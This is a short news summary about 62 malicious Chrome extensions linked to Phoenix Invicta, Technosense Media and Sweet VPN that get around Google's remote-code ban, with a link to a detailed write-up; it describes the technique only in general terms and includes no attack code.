62 malicious Chrome extensions have found ways around Google’s ban on remote code execution. They’re linked to Phoenix Invicta, Technosense Media, and notably, Sweet VPN. These extensions inject ads and could compromise user data.
Phoenix Invicta, once known as Funteq Inc., has a convoluted corporate setup, with ties to the US, Hong Kong, and operations in Ukraine. They use techniques like manipulating the declarativeNetRequest API to execute remote code, despite Google’s restrictions.
Google’s reaction has been inconsistent; some extensions were removed after being flagged, but similar ones remain active. This situation underscores ongoing security concerns in the Chrome Web Store, highlighting the need for more robust monitoring and enforcement by Google.
Write-up: https://palant.info/2025/01/20/malicious-extensions-circumvent-googles-remote-code-ban/